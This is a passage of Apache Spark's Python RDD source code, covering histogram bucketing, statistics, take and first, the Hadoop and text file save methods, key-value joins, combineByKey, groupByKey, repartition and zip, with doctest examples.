raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
